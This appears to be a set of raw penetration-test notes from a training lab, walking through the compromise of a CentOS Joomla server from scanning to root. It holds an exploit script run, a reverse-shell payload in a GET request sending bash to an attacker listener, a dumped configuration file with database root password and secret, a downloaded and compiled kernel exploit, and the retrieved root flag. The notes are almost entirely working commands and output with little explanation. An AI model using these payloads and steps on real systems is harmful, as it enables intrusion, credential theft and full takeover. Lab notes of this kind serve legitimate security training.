nmap -sC -sV -T4 -A -Pn -p- --open 10.11.1.177
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-13 00:26 EST
Stats: 0:00:45 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 26.32% done; ETC: 00:29 (0:02:09 remaining)
Stats: 0:01:00 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 37.11% done; ETC: 00:29 (0:01:43 remaining)
Stats: 0:02:09 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 95.01% done; ETC: 00:29 (0:00:07 remaining)
Nmap scan report for 10.11.1.177
Host is up (0.020s latency).
Not shown: 65389 filtered tcp ports (no-response), 140 filtered tcp ports (host-prohibited), 1 closed tcp port (reset)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      vsftpd 2.2.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: ERROR
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 172.16.1.1
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 2.2.2 - secure, fast, stable
|_End of status
22/tcp   open  ssh      OpenSSH 5.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 d8:7c:9d:f7:47:c1:f3:60:88:ad:a4:85:f3:f1:85:b7 (DSA)
|_  2048 e3:fb:0f:74:d5:c1:ce:f1:73:a0:f0:16:ed:f4:e3:dd (RSA)
80/tcp   open  http     Apache httpd 2.2.15 ((CentOS))
|_http-server-header: Apache/2.2.15 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
443/tcp  open  ssl/http Apache httpd 2.2.15 ((CentOS))
| ssl-cert: Subject: commonName=cms01/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2016-11-20T16:32:24
|_Not valid after:  2017-11-20T16:32:24
|_ssl-date: 2025-02-13T05:28:42+00:00; -51s from scanner time.
|_http-server-header: Apache/2.2.15 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
3306/tcp open  mysql    MySQL (unauthorized)
Device type: general purpose|firewall|storage-misc
Running (JUST GUESSING): Linux 2.6.X|3.X|4.X (97%), WatchGuard Fireware 11.X (91%), Synology DiskStation Manager 5.X (90%), IPFire 2.X (87%)
OS CPE: cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3 cpe:/o:watchguard:fireware:11.8 cpe:/o:linux:linux_kernel cpe:/a:synology:diskstation_manager:5.1 cpe:/o:linux:linux_kernel:4 cpe:/o:ipfire:ipfire:2.11
Aggressive OS guesses: Linux 2.6.32 (97%), Linux 2.6.32 - 2.6.39 (95%), Linux 2.6.32 - 3.0 (93%), Linux 3.2 - 3.8 (92%), Linux 3.8 (92%), Linux 3.10 - 3.12 (92%), Linux 2.6.32 or 3.10 (92%), Linux 2.6.38 (91%), Linux 2.6.39 (91%), Linux 3.4 (91%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Unix
 
Host script results:
|_clock-skew: -51s
 
TRACEROUTE
HOP RTT      ADDRESS
1   20.24 ms 10.11.1.177
 
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 158.66 seconds
 

21/tcp   open  ftp      vsftpd 2.2.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: ERROR
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 172.16.1.1
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 2.2.2 - secure, fast, stable
|_End of status

ftp anonymous@10.11.1.177
Connected to 10.11.1.177.
220 (vsFTPd 2.2.2)
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||6272|).
ftp: Can't connect to `10.11.1.177:6272': No route to host
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 Jul 24  2015 pub
226 Directory send OK.
ftp> cd pub
250 Directory successfully changed.
ftp> ls
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> exit
221 Goodbye.
 

80/tcp   open  http     Apache httpd 2.2.15 ((CentOS))
|_http-server-header: Apache/2.2.15 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).

python2 joomraa.py -u test -p password -e test@email.com http://10.11.1.177
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
                                                                                                                    
     @@@   @@@@@@    @@@@@@   @@@@@@@@@@   @@@@@@@    @@@@@@    @@@@@@   @@@  
     @@@  @@@@@@@@  @@@@@@@@  @@@@@@@@@@@  @@@@@@@@  @@@@@@@@  @@@@@@@@  @@@  
     @@!  @@!  @@@  @@!  @@@  @@! @@! @@!  @@!  @@@  @@!  @@@  @@!  @@@  @@!  
     !@!  !@!  @!@  !@!  @!@  !@! !@! !@!  !@!  @!@  !@!  @!@  !@!  @!@  !@   
     !!@  @!@  !@!  @!@  !@!  @!! !!@ @!@  @!@!!@!   @!@!@!@!  @!@!@!@!  @!@  
     !!!  !@!  !!!  !@!  !!!  !@!   ! !@!  !!@!@!    !!!@!!!!  !!!@!!!!  !!!  
     !!:  !!:  !!!  !!:  !!!  !!:     !!:  !!: :!!   !!:  !!!  !!:  !!!       
!!:  :!:  :!:  !:!  :!:  !:!  :!:     :!:  :!:  !:!  :!:  !:!  :!:  !:!  :!:  
::: : ::  ::::: ::  ::::: ::  :::     ::   ::   :::  ::   :::  ::   :::   ::  
 : :::     : :  :    : :  :    :      :     :   : :   :   : :   :   : :  :::  
 
[-] Getting token
[-] Creating user account
[-] Getting token for admin login
[-] Logging in to admin
[+] Admin Login Success!
[+] Getting media options
[+] Setting media options
[*] Uploading exploit.pht
[*] Uploading exploit to: http://10.11.1.177/images/MOSPTJ5.pht
[*] Calling exploit
[!] Search string not in exploit
<Response [200]>
[*] FAILURE

pass: joomlaadministrator

GET /templates/protostar/error.php?0=bash+-i+>%26+/dev/tcp/172.16.1.1/80+0>%261 HTTP/1.1

nc -lvnp 80
listening on [any] 80 ...
connect to [172.16.1.1] from (UNKNOWN) [10.11.1.177] 48395
bash: no job control in this shell
bash-4.1$ whoami
whoami
apache

bash-4.1$ uname -a
uname -a
Linux cms01 2.6.32-573.el6.i686 #1 SMP Thu Jul 23 12:37:35 UTC 2015 i686 i686 i386 GNU/Linux

bash-4.1$ cat configuration.php
cat configuration.php
<?php
class JConfig {
	public $offline = '0';
	public $offline_message = 'This site is down for maintenance.<br />Please check back again soon.';
	public $display_offline_message = '1';
	public $offline_image = '';
	public $sitename = 'Joomla 3.6.3 Test Site';
	public $editor = 'tinymce';
	public $captcha = '0';
	public $list_limit = '20';
	public $access = '1';
	public $debug = '0';
	public $debug_lang = '0';
	public $dbtype = 'mysqli';
	public $host = 'localhost';
	public $user = 'root';
	public $password = 'root1988';
	public $db = 'joomla';
	public $dbprefix = 'yk3ym_';
	public $live_site = '';
	public $secret = 'i5X5ltoz8LACyLu8';
	public $gzip = '0';
	public $error_reporting = 'default';
	public $helpurl = 'https://help.joomla.org/proxy/index.php?keyref=Help{major}{minor}:{keyref}';
	public $ftp_host = '127.0.0.1';
	public $ftp_port = '21';
	public $ftp_user = '';
	public $ftp_pass = '';
	public $ftp_root = '';
	public $ftp_enable = '0';
	public $offset = 'UTC';
	public $mailonline = '1';
	public $mailer = 'mail';
	public $mailfrom = 'administrator@cms01.local';
	public $fromname = 'Joomla 3.6.3 Test Site';
	public $sendmail = '/usr/sbin/sendmail';
	public $smtpauth = '0';
	public $smtpuser = '';
	public $smtppass = '';
	public $smtphost = 'localhost';
	public $smtpsecure = 'none';
	public $smtpport = '25';
	public $caching = '0';
	public $cache_handler = 'file';
	public $cachetime = '15';
	public $cache_platformprefix = '0';
	public $MetaDesc = '';
	public $MetaKeys = '';
	public $MetaTitle = '1';
	public $MetaAuthor = '1';
	public $MetaVersion = '0';
	public $robots = '';
	public $sef = '1';
	public $sef_rewrite = '0';
	public $sef_suffix = '0';
	public $unicodeslugs = '0';
	public $feed_limit = '10';
	public $feed_email = 'none';
	public $log_path = '/var/www/html/administrator/logs';
	public $tmp_path = '/var/www/html/tmp';
	public $lifetime = '15';
	public $session_handler = 'database';

╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits
Linux version 2.6.32-573.el6.i686 (mockbuild@c6b9.bsys.dev.centos.org) (gcc version 4.4.7 20120313 (Red Hat 4.4.7-16) (GCC) ) #1 SMP Thu Jul 23 12:37:35 UTC 2015
LSB Version:	:base-4.0-ia32:base-4.0-noarch:core-4.0-ia32:core-4.0-noarch:graphics-4.0-ia32:graphics-4.0-noarch:printing-4.0-ia32:printing-4.0-noarch
Distributor ID:	CentOS
Description:	CentOS release 6.7 (Final)
Release:	6.7
Codename:	Final
 
╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version
Sudo version 1.8.6p3

mv /home/sake/Downloads/25444.c ./

docker run --rm -v "$PWD":/usr/src/myapp -w /usr/src/myapp gcc:4.8 gcc -O2 25444.c -o 25444

bash-4.1$ wget http://172.16.1.1/25444

ssh root@10.11.1.177 -oHostKeyAlgorithms=+ssh-dss
The authenticity of host '10.11.1.177 (10.11.1.177)' can't be established.
DSA key fingerprint is SHA256:ardwRFuS5QwkJwvKm2UXEu0ZU9uQVS0Pu3w4W+2NgYY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.11.1.177' (DSA) to the list of known hosts.
root@10.11.1.177's password: 
Permission denied, please try again.
root@10.11.1.177's password: 
Last login: Tue Apr  6 09:36:10 2021
[root@cms01 ~]# whoami
root
[root@cms01 ~]# cat /root/key.txt
cvxdxsy3cjhhbk0zbfuf
[root@cms01 ~]# date
Thu Feb 13 11:44:13 EST 2025